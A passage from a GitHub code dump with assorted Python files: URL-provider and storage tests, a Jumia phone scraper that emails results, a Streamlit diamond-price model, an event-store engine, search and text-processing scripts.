'url': 'https://opendap.jpl.nasa.gov/opendap/',\n }),\n verify_urls.HTTPProvider('scihub', {\n 'url': 'https://scihub.copernicus.eu/',\n 'username': 'copernicus_user',\n 'password': 'copernicus_password'\n }),\n verify_urls.HTTPProvider('creodias', {\n 'url': 'https://zipper.creodias.eu/',\n 'username': 'creodias_user',\n 'password': 'creodias_password',\n 'token_url': 'https://auth.creodias.eu/auth/realms/DIAS/protocol/'\n 'openid-connect/token',\n 'client_id': 'CLOUDFERRO_PUBLIC',\n 'throttle': 1,\n 'auth_renew': 36000\n }),\n verify_urls.FTPProvider('rtofs', {\n 'url': 'ftp://ftpprd.ncep.noaa.gov/pub/data/nccf/com/rtofs/prod/'\n })\n ])\n\n def test_get_http_provider(self):\n \"\"\"Test that a HTTPProvider is returned when the url starts\n with 'http'\n \"\"\"\n self.assertIsInstance(\n verify_urls.get_provider('test', {'url': 'http://foo'}),\n verify_urls.HTTPProvider)\n self.assertIsInstance(\n verify_urls.get_provider('test', {'url': 'https://foo'}),\n verify_urls.HTTPProvider)\n\n def test_get_ftp_provider(self):\n \"\"\"Test that a FTPProvider is returned when the url starts\n with 'ftp'\n \"\"\"\n self.assertIsInstance(\n verify_urls.get_provider('test', {'url': 'ftp://foo'}),\n verify_urls.FTPProvider)\n\n def test_get_provider_error(self):\n \"\"\"A ValueError should be raised if no type of provider can be\n chosen\n \"\"\"\n with self.assertRaises(ValueError):\n verify_urls.get_provider('test', {'url': 'file:///foo/'})\n\n def test_bounded_thread_pool_executor_init(self):\n \"\"\"The executor should have a semaphore attribute with an\n initial value equal to the provided queue limit + the number of\n workers\n \"\"\"\n pool_executor = verify_urls.BoundedThreadPoolExecutor(max_workers=1, queue_limit=1)\n self.assertIsInstance(pool_executor.semaphore, verify_urls.BoundedSemaphore)\n self.assertEqual(pool_executor.semaphore._initial_value, 2)\n\n def test_bounded_thread_pool_executor_submit(self):\n \"\"\"This executor should stop adding jobs to its internal queue\n when it hits the limit\n \"\"\"\n # check that the semaphore is acquired and released in a\n # normal case\n with verify_urls.BoundedThreadPoolExecutor(max_workers=1, queue_limit=1) as bounded_pool:\n bounded_pool.semaphore = mock.Mock()\n bounded_pool.submit(lambda x: x, 1,)\n bounded_pool.semaphore.acquire.assert_called()\n bounded_pool.semaphore.release.assert_called()\n\n # check that the semaphore is acquired and released when\n # submit() raises an exception\n with mock.patch('concurrent.futures.ThreadPoolExecutor.submit', side_effect=ValueError):\n with verify_urls.BoundedThreadPoolExecutor(\n max_workers=1, queue_limit=1) as bounded_pool:\n bounded_pool.semaphore = mock.Mock()\n with self.assertRaises(ValueError):\n bounded_pool.submit(lambda x: x, 1,)\n bounded_pool.semaphore.acquire.assert_called()\n bounded_pool.semaphore.release.assert_called()\n","repo_name":"nansencenter/django-geo-spaas-harvesting","sub_path":"tests/test_verify_urls.py","file_name":"test_verify_urls.py","file_ext":"py","file_size_in_byte":43950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"10234218755","text":"import unittest\nimport os\nimport sys\nimport shutil\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = os.path.join(\n os.path.dirname(BASE_DIR), \"cloud_credentials.json\")\nsys.path.append(BASE_DIR)\nfrom v1.file_storage import LocalStorage, CloudStorage\n\nSTORAGE_DIR = os.path.join(BASE_DIR, \"storage_test\")\n\nclass TestFileStorage(unittest.TestCase):\n def setUp(self):\n if not os.path.exists(STORAGE_DIR):\n os.mkdir(STORAGE_DIR)\n self.storage = LocalStorage(os.path.join(STORAGE_DIR, \"test.txt\"), \"w\")\n\n def test_write(self):\n self.storage = LocalStorage(os.path.join(STORAGE_DIR, \"test.txt\"), \"w\")\n self.storage.write(\"Hello world\")\n with open(os.path.join(STORAGE_DIR, \"test.txt\"), \"r\") as file:\n self.assertEqual(file.read(), \"Hello world\")\n\n def test_read(self):\n self.storage = LocalStorage(os.path.join(STORAGE_DIR, \"test.txt\"), \"r\")\n with open(os.path.join(STORAGE_DIR, \"test.txt\"), \"w\") as file:\n file.write(\"Hello world\")\n self.assertEqual(self.storage.read(), \"Hello world\")\n\n def tearDown(self):\n shutil.rmtree(STORAGE_DIR)\n\nclass TestCloudStorage(unittest.TestCase):\n def setUp(self):\n self.storage = CloudStorage(\"test.txt\")\n self.storage.write(\"Hello world\")\n\n def test_read(self):\n self.assertEqual(self.storage.read(), b\"Hello world\")\n\n def tearDown(self):\n self.storage.blob.delete()\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"danip056/entrega_1","sub_path":"backend/v1/test_filestorage.py","file_name":"test_filestorage.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37815665615","text":"import os \nimport numpy as np\n\n\n#this code can make a label table as the following structure:\n''' \n image gender\n 123456.jpg man\n 123457.jpg woman\n ... ...\n \n''' \n#does this useful? I don't know. At least i didn't use this table for such a simple binary classification \npath_dataset='all'\n#print(type(os.listdir(path_dataset+'/man')))\nlist_man=os.listdir(path_dataset+'/man')\nlist_woman=os.listdir(path_dataset+'/woman')\nlist_man=[[x]+[0] for x in list_man]\nlist_woman=[[x]+[1] for x in list_woman]\n\n\nlist_man.sort()\nlist_woman.sort()\nwhole_list=list_man+list_woman\nwhole_list.sort()\nwhole_list=np.array(whole_list)\n\n#save the label table as the numpy npy format\nnp.save(path_dataset+'/label',whole_list)\n#save the label table as the txt format\nwith open(path_dataset+'/label.txt','w')as txt_label:\n txt_label.write(' image gender'+'\\n')\n for row in whole_list:\n if row[1]=='0':\n txt_label.write(row[0]+' man\\n')\n else:\n txt_label.write(row[0]+' woman\\n')\n\n","repo_name":"CZhihao/gender-prediction","sub_path":"gender_classification/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"19127689624","text":"\"\"\"\nCreated on Thu Apr 8 09:06:12 2021\n\n@author: Henry Chuks\n\"\"\"\n\n\n#importing libraries\nfrom openpyxl import Workbook\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException, ElementClickInterceptedException\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport smtplib\nfrom email.message import EmailMessage\nfrom selenium.webdriver.chrome.options import Options\n\n\nopt = Options()\nopt.add_argument(\"--headless\")\n\n#initializing the driver and opening url\ndriver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=opt)\ndriver.maximize_window()\ndriver.get(\"https://www.jumia.com.ng/\")\ndriver.implicitly_wait(10)\ntime.sleep(5)\ndriver.find_element(By.XPATH, \"//input[contains(@id, 'fi-q')]\").send_keys(\"samsung phones\")\ndriver.find_element(By.XPATH, \"//button[contains(@class, 'btn _prim _md -mls -fsh0')]\").click()\n\n#creating empty list for phone names, prices and ratings\nphonesList = []\nratingsList = []\npriceList = []\n\n#This function will be getting the actual data from each page for every device clicked\n#and then appending the data gotten into the empty list as defined above\ndef get_data(phone_name, price, ratings): #function to get phone name, price and ratings for each samsung device\n try:\n phonenames = driver.find_element(By.XPATH, str(phone_name))\n phonesList.append(phonenames.text)\n except NoSuchElementException:\n phonenames = 'Nan'\n phonesList.append(phonenames)\n \n try:\n prices = driver.find_element(By.XPATH, str(price))\n priceList.append(prices.text)\n except NoSuchElementException:\n prices = 'Nan'\n priceList.append(prices)\n \n try:\n rating = driver.find_element(By.XPATH, str(ratings))\n ratingsList.append(rating.text)\n except NoSuchElementException:\n rating = 'Nan'\n ratingsList.append(rating)\n \n #priceList.pop()\n \n\"\"\"\nThe function below is literally just to deal wth the stale element reference exception\n\"\"\"\ndef get_page():\n try:\n get_data('//h1[@class=\"-fs20 -pts -pbxs\"]', '//*[@id=\"jm\"]/main/div[2]/section/div/div[2]/div[2]/div[3]/span',\n '//*[@id=\"jm\"]/main/div[2]/section/div/div[2]/div[2]/div[2]/div')\n except StaleElementReferenceException:\n get_data('//h1[@class=\"-fs20 -pts -pbxs\"]', '//*[@id=\"jm\"]/main/div[2]/section/div/div[2]/div[2]/div[3]/span',\n '//*[@id=\"jm\"]/main/div[2]/section/div/div[2]/div[2]/div[2]/div')\n\n#This function will click on every device on the each page and get data with the get_data() function defined above \ndef click_main():\n main = driver.find_elements(By.XPATH, '//div[@class=\"info\"]')\n for c in range(1,len(main)+1):\n click_on = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"jm\"]/main/div[2]/div[3]/section/div[1]/article['+str(c)+']/a/div[2]'))\n )\n driver.execute_script(\"arguments[0].click();\", click_on)\n #click_on.click()\n get_page()\n time.sleep(3)\n driver.execute_script(\"window.history.go(-1)\")\n time.sleep(2)\n \n#this will scrap the first page loaded\nclick_main() \n#get_data('//h3[contains(@class, \"name\")]', 'prc', 'stars _s') #ignore please\n\n\"\"\"\nthe following try and except blocks will be responsible for clicking through the next pages after scraping each page\nuntil it gets to the fifth page\n\"\"\"\ntry:\n element = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, \"/html/body/div[1]/main/div[2]/div[3]/section/div[2]/a[4]\"))\n )\n driver.execute_script(\"arguments[0].click();\", element)\n print(\"Collected data on First page\")\nexcept ElementClickInterceptedException:\n try:\n nextPage = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"a.pg:nth-child(4)\"))\n )\n driver.execute_script(\"arguments[0].click();\", nextPage)\n print(\"Collected data on first page by Second try\")\n except Exception as e:\n print(\"Driver couldn't reach the second page\")\n print(e)\ntime.sleep(5)\nclick_main()\n\ntry:\n pageThree = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"jm\"]/main/div[2]/div[3]/section/div[2]/a[5]'))\n )\n driver.execute_script(\"arguments[0].click();\", pageThree)\n print(\"Collected data on Second page\")\nexcept ElementClickInterceptedException:\n print(\"Driver couldn't reach the third page\")\n driver.quit()\ntime.sleep(5)\nclick_main()\n\ntry:\n pageFour = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"jm\"]/main/div[2]/div[3]/section/div[2]/a[5]'))\n )\n driver.execute_script(\"arguments[0].click();\", pageFour)\n print(\"Collected data on Third page\")\nexcept ElementClickInterceptedException:\n print(\"Driver couldn't reach the fourth page\")\n driver.quit()\ntime.sleep(5)\nclick_main()\n\ntry:\n pageFive = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"jm\"]/main/div[2]/div[3]/section/div[2]/a[5]'))\n )\n driver.execute_script(\"arguments[0].click();\", pageFive)\n print(\"Collected data on Fourth page\")\nexcept ElementClickInterceptedException:\n print(\"Driver couldn't reach the fifth page\")\n driver.quit()\ntime.sleep(5)\nclick_main()\n\nprint(\"Collected data on the fifth page\")\n\nprint(\"Done!\")\n\n\n\"\"\"\nThe section above from line 92 to 149 would actually be a good part to implement the python loop, for loop to be precise, which I have also\nwritten in a seperate file, it was only done this way given the few number of pages to be scraped, however if there were about a tens\nof a bigger amount of pages to be scraped then the for loop which I ve written as is also part this github repo as \"the for loop\" should definitely\nbe implemented otherwise\n\"\"\"\n\nprint(len(phonesList))\nprint(len(priceList))\nprint(len(ratingsList))\n\n\"\"\"\nThe following 'if else' block will be responsible for creating and putting the scrapped data into as excel file and sending to the special\nemail address which is mine too, just to showcase it\nBut first it will compare the lengths of the price list, phone list and rating list to check if they are equal\nbecause if not, then the finallist created to zip them will be inaccurate and hence will cause analytical error if the data should be used for\nanalysis\n\"\"\"\n\n\nif len(phonesList)==len(priceList) and len(phonesList)==len(ratingsList) and len(priceList)==len(ratingsList):\n finallist = zip(phonesList, priceList, ratingsList)\n \n wb = Workbook()\n wb['Sheet'].title = 'Jumia Samsung Data'\n sh1 = wb.active\n sh1.append(['Name', 'Price', 'Ratings'])\n \n for x in list(finallist):\n sh1.append(x)\n \n wb.save(\"JumiaSamsungData.xlsx\")\n \n print(\"Sending Email...\\n\")\n password = input(\"Type password here and press enter: \")\n \n msg = EmailMessage()\n msg['Subject'] = 'Scraped Data on Samsung phones from jumia.com'\n msg['From'] = 'HENRY.ANG'\n msg['To'] = 'henrychukwu134@gmail.com'\n \n with open('EmailTemplate') as file:\n data = file.read()\n msg.set_content(data)\n \n with open('JumiaSamsungData.xlsx', 'rb') as f:\n file_data = f.read()\n file_name = f.name\n print(\"File name is \",file_name)\n msg.add_attachment(file_data,maintype=\"multipart\",subtype=\"xlsx\",filename=file_name)\n \n with smtplib.SMTP_SSL('smtp.gmail.com', 465) as server:\n server.login(\"barrychukwu12@gmail.com\", password)\n server.send_message(msg)\n\n print('Email Sent !!!')\n\nelse:\n print(\"Failed to create an Excel file and Email not sent\")\n pass\n","repo_name":"henrychuks002/Data-Scraping-with-Selenium","sub_path":"Data Collection project/jumiadata.py","file_name":"jumiadata.py","file_ext":"py","file_size_in_byte":7921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"73153165531","text":"import pandas as pd\r\nimport numpy as np\r\nimport streamlit as st\r\nimport datetime\r\nimport plotly.express as px\r\nimport plotly.figure_factory as ff\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.pipeline import Pipeline\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\r\nfrom sklearn.preprocessing import LabelEncoder\r\n\r\nfrom sklearn.svm import LinearSVR\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, mean_absolute_percentage_error, r2_score\r\n\r\n\r\nst.set_page_config(layout=\"wide\")\r\n\r\n\r\n#@st.cache(allow_output_mutation=True)\r\ndef get_data():\r\n df = pd.read_csv(\"diamonds.csv\")\r\n df = df.drop(['Unnamed: 0'], axis=1)\r\n return df\r\n\r\nData = get_data()\r\n\r\n## Title\r\nst.markdown(\"

REPORT �

\", unsafe_allow_html=True)\r\n\r\n\r\n## Greeting\r\nnow = datetime.datetime.now()\r\nhour = now.hour\r\nif hour < 12:\r\n greeting = \"Good morning\"\r\nelif hour < 17:\r\n greeting = \"Good afternoon\"\r\nelse:\r\n greeting = \"Good evening\"\r\nst.write(\"{}!\".format(greeting))\r\n\r\nst.markdown(\"

========================================================================================

\", unsafe_allow_html=True)\r\n\r\nclarity_oder = ['IF', 'VVS1', 'VVS2', 'VS1', 'VS2', 'SI1', 'SI2', 'I1', 'Ideal', 'Premium', 'Very Good', 'Good', 'Fair']\r\ncode1_s = [1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5]\r\n\r\n\r\n##Part -1 EDA\r\nst.sidebar.write('EDA Report')\r\nDataset = st.sidebar.checkbox(\"Dataset\")\r\nif Dataset:\r\n st.markdown(\"

Dataset Head

\", unsafe_allow_html=True)\r\n st.table(Data.head())\r\n st.write(Data.shape)\r\n\r\nEDA = st.sidebar.checkbox(\"EDA\")\r\nif EDA:\r\n st.markdown(\"

Exploratory Data Analysis

\", unsafe_allow_html=True)\r\n Describe = st.checkbox(\"Describe\")\r\n Indivual = st.checkbox(\"Indivual\")\r\n if Describe:\r\n st.markdown(\"

Descriptive Statistics

\", unsafe_allow_html=True)\r\n st.table(Data.describe())\r\n df = Data.corr()\r\n df = round(df,2)\r\n fig = px.imshow(df, width=800, height=800, text_auto=True, color_continuous_scale='RdBu_r')\r\n st.markdown(\"

Correlation

\", unsafe_allow_html=True)\r\n st.plotly_chart(fig)\r\n\r\n\r\n\r\n if Indivual:\r\n col1, col2 = st.columns([1, 1])\r\n select_column = col1.selectbox(\"Select Column\", (\"color\", \"clarity\", \"cut\", \"carat\", \"depth\", \"table\",\"x\",\"y\",\"z\"))\r\n cart = [\"color\", \"clarity\", \"cut\"]\r\n cl1, cl2 = st.columns([1, 1])\r\n if select_column in cart:\r\n df1 = Data.groupby(by=[select_column]).size().reset_index(name=\"counts\")\r\n df1['ss'] = df1[select_column].replace(clarity_oder, code1_s)\r\n df1 = pd.DataFrame(df1.sort_values(by=['ss']))\r\n df1 = df1.drop('ss', axis=1, inplace=False)\r\n df1 = df1.reset_index(drop=True)\r\n Data['PPC'] = Data['price']/Data['carat']\r\n fig = px.bar(df1, x=select_column, y=\"counts\", title=\"Count Plot\", color=select_column, width=400, height=400)\r\n fig1 = px.pie(df1, values='counts', names=select_column, title='Pie Chart', width=400,\r\n height=400)\r\n fig0 = px.box(Data, y=\"price\", x=select_column, width=800, height=600, color=select_column)\r\n else:\r\n x = select_column\r\n fig = px.box(Data, y=x, title=\"Box Plot\", width=400, height=400)\r\n fig1 = px.histogram(Data, x=x, title=\"Histogram\", width=400, height=400)\r\n fig0 = ff.create_2d_density(Data['price'], Data[x], width=800, height=600)\r\n #iplot(fig)\r\n cl1.plotly_chart(fig)\r\n cl2.plotly_chart(fig1)\r\n st.plotly_chart(fig0)\r\n\r\n # fig = px.violin(Data, y=\"price\", x=\"color\", width=800, height=500)\r\n # st.plotly_chart(fig)\r\n # fig = plt.figure(figsize=(10, 4))\r\n # sns.violinplot(data=Data, x=\"color\", y=\"price\", split=True)\r\n # st.pyplot(fig)\r\n\r\nData1 = Data\r\n\r\nle = LabelEncoder()\r\n\r\nData1['cut'] = le.fit_transform(Data1['cut'])\r\nData1['color'] = le.fit_transform(Data1['color'])\r\nData1['clarity'] = le.fit_transform(Data1['clarity'])\r\n\r\nX=Data1.drop('price',axis=1)\r\ny=Data1['price']\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)\r\n\r\nRe = st.sidebar.selectbox(\"Select\",(\"LinearSVR\",\"KNeighborsRegressor\",\"LinearRegression\",\"RandomForestRegressor\",\r\n \"GradientBoostingRegressor\",\"DecisionTreeRegressor\"))\r\n\r\nif Re == \"LinearSVR\":\r\n pipe1 = Pipeline([\r\n ('scaler', StandardScaler()),\r\n ('model', LinearSVR(random_state = 42))])\r\n\r\n model = pipe1.fit(X_train, y_train)\r\n\r\n y_pred = model.predict(X_test)\r\n\r\nelif Re == \"KNeighborsRegressor\":\r\n pipe2 = Pipeline([\r\n ('scaler', MinMaxScaler()),\r\n ('model', KNeighborsRegressor())])\r\n\r\n model = pipe2.fit(X_train, y_train)\r\n\r\n y_pred = model.predict(X_test)\r\n\r\nelif Re == \"LinearRegression\":\r\n pipe3 = Pipeline([\r\n ('scaler', StandardScaler()),\r\n ('model', LinearRegression())])\r\n\r\n model = pipe3.fit(X_train, y_train)\r\n\r\n y_pred = model.predict(X_test)\r\n\r\nelif Re == \"RandomForestRegressor\":\r\n model = RandomForestRegressor(random_state = 42).fit(X_train, y_train)\r\n\r\n y_pred = model.predict(X_test)\r\n\r\nelif Re == \"GradientBoostingRegressor\":\r\n model = GradientBoostingRegressor(random_state = 42).fit(X_train, y_train)\r\n\r\n y_pred = model.predict(X_test)\r\n\r\nelif Re == \"DecisionTreeRegressor\":\r\n model = DecisionTreeRegressor(random_state = 42).fit(X_train, y_train)\r\n\r\n y_pred = model.predict(X_test)\r\n\r\nresult = st.sidebar.checkbox(\"Show Result Score\")\r\na = mean_absolute_error(y_test, y_pred)\r\nb = mean_absolute_percentage_error(y_test, y_pred)\r\nc = mean_squared_error(y_test, y_pred, squared = True)\r\nd = mean_squared_error(y_test, y_pred, squared = False)\r\ne = r2_score(y_test, y_pred)*100\r\nTable = {\r\n \"Results\": [\"MAE\", \"MAPE\", \"MSE\", \"RMSE\", \"R2\"],\r\n \"Score\": [a, b, c, d, e]\r\n}\r\ntable = pd.DataFrame(Table)\r\nif result:\r\n st.title(Re)\r\n st.table(table)\r\n\r\n#Predication\r\npr = st.sidebar.checkbox(\"Predication\")\r\nif pr:\r\n col1, col2 = st.columns([1,1])\r\n c1 = col1.selectbox(\"Color\",('D','E','F','G','H','I','J'))\r\n cl1 = col2.selectbox(\"Clarity\",('IF','VVS1','VVS2','VS1','VS2','SI1','SI2','I1'))\r\n cu1 = col1.selectbox(\"Cut\",('Ideal','Premium','Very Good','Good','Fair'))\r\n ca1 = col2.number_input(\"Carat\")\r\n dp1 = col1.number_input(\"Depth\")\r\n tb1 = col2.number_input(\"Table\")\r\n x1 = col1.number_input(\"x\")\r\n y1 = col2.number_input(\"y\")\r\n z1 = col1.number_input(\"z\")\r\n\r\n st.button(\"Predict\")\r\n\r\n pred = X_test\r\n pred = pred.iloc[0:0]\r\n pred = pred.append({'carat': ca1, 'cut': 2, 'color': 0, 'clarity': 4, 'depth': dp1, 'table': tb1, 'x': x1, 'y': y1, 'z': z1}, ignore_index=True)\r\n\r\n #model = RandomForestRegressor(random_state=42).fit(X_train, y_train)\r\n y_pred = model.predict(pred)\r\n y_pred = round(y_pred[0],1)\r\n st.markdown(f\"

Price : ${y_pred}

\", unsafe_allow_html=True)\r\n\r\n","repo_name":"Divyraj-K/Diamonds-Price-Predication-App","sub_path":"Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":7563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"14726026404","text":"import json\n\n\n# Need test\ndef save_db(db_to_save, file_name):\n try:\n with open(f'db/{file_name}', 'w') as file:\n json.dump(db_to_save, file)\n except NameError :\n print(f'{file_name} : Can Not Save. Database Files Not Found')\n\ndef load_db(file_name):\n try:\n with open(f'db/{file_name}', 'r') as file:\n return json.load(file)\n except FileNotFoundError as e :\n print(f'load_db() : {e}\\nrun \"fixdb\" command in main console')\n\n","repo_name":"MohandZaid/Crowd-Funding-App","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2925367532","text":"from carchiver import carchiver\n\nfrom cengine import cengine\n\nNAME=\"eventstore\"\n\nclass engine(cengine):\n\tdef __init__(self, *args, **kargs):\n\t\tcengine.__init__(self, name=NAME, *args, **kargs)\n\t\t\n\t\tself.archiver = carchiver(namespace='events', autolog=True, logging_level=self.logging_level)\n\t\t \n\tdef work(self, event, *args, **kargs):\n\t\tevent_id = event['rk']\n\t\t\n\t\texchange = None\n\t\ttry:\n\t\t\texchange = event['exchange']\n\t\t\tdel event['exchange']\n\t\texcept:\n\t\t\tpass\n\t\t\t\n\t\tevent_types = ['check', 'trap', 'comment', 'log', 'user', 'selector', 'sla', 'perf', 'eue', 'topology', 'consolidation']\n\t\tevent_type = event['event_type']\n\t\t\n\t\tif event_type not in event_types:\n\t\t\tself.logger.warning(\"Unknown event type '%s', id: '%s', event:\\n%s\" % (event_type, event_id, event))\n\t\t\treturn event\n\t\t\n\t\t## Archive event\n\t\tif event_type == 'perf' :\n\t\t\tpass\n\t\telif event_type == 'check' or event_type == 'selector' or event_type == 'sla' or event_type == 'eue' or event_type == 'topology' or event_type == 'consolidation':\n\t\t\t\n\t\t\t_id = self.archiver.check_event(event_id, event)\n\t\t\tif _id:\n\t\t\t\tevent['_id'] = _id\n\t\t\t\tevent['event_id'] = event_id\n\t\t\t\t## Event to Alert\n\t\t\t\tself.amqp.publish(event, event_id, self.amqp.exchange_name_alerts)\n\n\t\telif event_type == 'trap' or event_type == 'log':\n\t\t\t\n\t\t\t## passthrough\n\t\t\tself.archiver.store_event(event_id, event)\n\t\t\t_id = self.archiver.log_event(event_id, event)\n\t\t\tevent['_id'] = _id\n\t\t\tevent['event_id'] = event_id\n\n\t\t\t## Event to Alert\n\t\t\tself.amqp.publish(event, event_id, self.amqp.exchange_name_alerts)\n\t\t\t\n\t\telif event_type == 'user' or event_type == 'comment':\n\t\t\t\n\t\t\t## passthrough\n\t\t\t_id = self.archiver.log_event(event_id, event)\n\t\t\tevent['_id'] = _id\n\t\t\tevent['event_id'] = event_id\n\n\t\t\t## Event to Alert\n\t\t\tself.amqp.publish(event, event_id, self.amqp.exchange_name_alerts)\n\t\t\t\n\t\treturn event\n","repo_name":"chiehwen/canopsis","sub_path":"sources/amqp2engines/opt/amqp2engines/engines/eventstore.py","file_name":"eventstore.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"40049942038","text":"import os\nimport cv2\nimport numpy as np\n\n# Read imgs from test-classes folders as an array\ndef load_data(path, print_file_read = True):\n '''\n :param path(str): root path of dataset, e.g.\"/Users/shenyi/Desktop/Gamepipe/trainset/\"\n :param print_file_read(bool): show current processing file names\n :return np.array(imgs): numpy format array of images, with shape (num_of_pictures, width, length, channels)\n ap.array(labels): numpy format array of labels\n '''\n imgs = []\n labels = []\n cates = next(os.walk(path))[1]\n folders = [path + x for x in cates if os.path.isdir(path + x)]\n\n for idx, folder in enumerate(folders):\n i = 1\n for root, subFolers, files in os.walk(folder):\n for file in files:\n if (os.path.splitext(file)[1] in ['.jpg', '.bmp', '.png', 'jpeg']):\n img_path = os.path.join(root, file)\n if (print_file_read):\n print('Reading image %d:%s' % (i, img_path))\n img = cv2.imread(img_path)\n imgs.append(img)\n labels.append(idx)\n\n return np.array(imgs), np.array(labels)\n\n\ndef main():\n load_data(\"/Users/shenyi/Desktop/Gamepipe/trainset/\")\n\nif __name__ == '__main__':\n main()","repo_name":"shen-ee/GHD-helper","sub_path":"img_reader.py","file_name":"img_reader.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"14217871949","text":"def f(x):\n left,right,keta = 1,10,1 #!(left,right]\n res = 0\n mod = 10**9 + 7\n while True:\n right = min(right,x+1)\n res += keta*(left+right-1)*(right-left) // 2\n if right == x+1:\n return res\n res %= mod\n left *= 10\n right *= 10\n keta += 1\n\ndef main():\n mod = 10**9+7\n L,R = map(int,input().split())\n ans = f(R) - f(L-1)\n print(ans % mod)\n\nif __name__ == '__main__':\n main()\n","repo_name":"tokuD/atcoder","sub_path":"tenkei90/082.py","file_name":"082.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42039186096","text":"# Jump sort will jump some steps\n# When the next step is greater than finding elements\n# It will get back to previous element\n# And perform linear sort\n\n# Time Complexity is O(n^0.5)\n\n\ndef jump_search(arr, find):\n length = len(arr)\n\n step = pow(length, 0.5)\n\n prev = 0\n\n while arr[int(min(step, length) - 1)] < find:\n prev = int(step)\n step += pow(length, 0.5)\n if prev >= find:\n return -1\n\n while arr[prev] < find:\n prev += 1\n\n if prev == min(step, length):\n return -1\n\n if arr[prev] == find:\n return prev\n\n\nelement_list = [0, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nfind = 1\n\nindex = jump_search(element_list, find)\nif index:\n print(f\"Element found at {index + 1} position.\")\nelse:\n print(\"Element is not present in given list.\")\n","repo_name":"ArjunKhunti/searching-algos","sub_path":"python3/jump_search.py","file_name":"jump_search.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14799864215","text":"#Sue Huang\n#03/13/19\n#uses the food python library USDA\n#searches the food library for all descriptions\n#makes them lowercase and word tokenizes them\n\n\n#drag the .py and .db files into env/lib/PythonX/site-packages/\n#https://think.cs.vt.edu/corgis/python/food/food.html\n#download sqlite browser to view db of food\n\n\n\n\nimport food\nfrom nltk.tokenize import sent_tokenize\nfrom nltk.tokenize import word_tokenize\nfrom itertools import permutations #to iterate through lists in permutations and combinations\n\n#list_of_report is a list of dictionaries\nlist_of_report = food.get_reports()\n\n#for key in list_of_report:\n #print(key)\n#print(isinstance(list_of_report,list))\n#print(isinstance(list_of_report[0],dict))\n\n#for food in list_of_report:\n #category = food[\"Category\"]\n #print(category)\n \nfor food in list_of_report:\n description = food[\"Description\"].lower() #converts everything to lower case\n tokens = word_tokenize(description)\n words = [word for word in tokens if word.isalpha()] #removes commas\n #do a replacement of abbreviations with full words for example inst with instant and whl with whole\n #print(words)\n for word in words:\n #if word == \"pudding\":\n min_perm = 1\n max_perm = 3\n wd_permutations = []\n for x in range(min_perm, max_perm):\n for y in permutations(words, x):\n wd_permutations.append(y)\n #wd_permutations = permutations(words, 2)\n wd_permutation_list = list(wd_permutations)\n print(wd_permutation_list)\n #print(type(wd_permutation_list))\n\n\n#we will search for what \"clouds taste like\" in the twitter data and if something in the string is equivalent to portions of string from description, then we will count that as an ingredient for the ice cream","repo_name":"esesms/collectclouds","sub_path":"examples/db_flavor_search.py","file_name":"db_flavor_search.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11714875457","text":"import os\nimport numpy as np\nimport gpitch\nfrom gpitch.methods import readaudio\n\n\ndef load_filenames(path, inst, names):\n files = np.asarray(os.listdir(path)) # load name all files in directory\n nfiles = len(files) # number of files in directory\n\n flag = np.asarray(nfiles * [None]) # flag to mark if name of instrument present in filename\n for i in range(nfiles): # mark file names with instrument in it\n flag[i] = files[i].find(inst)\n\n idx = np.where(flag != -1)[0] # choose only file 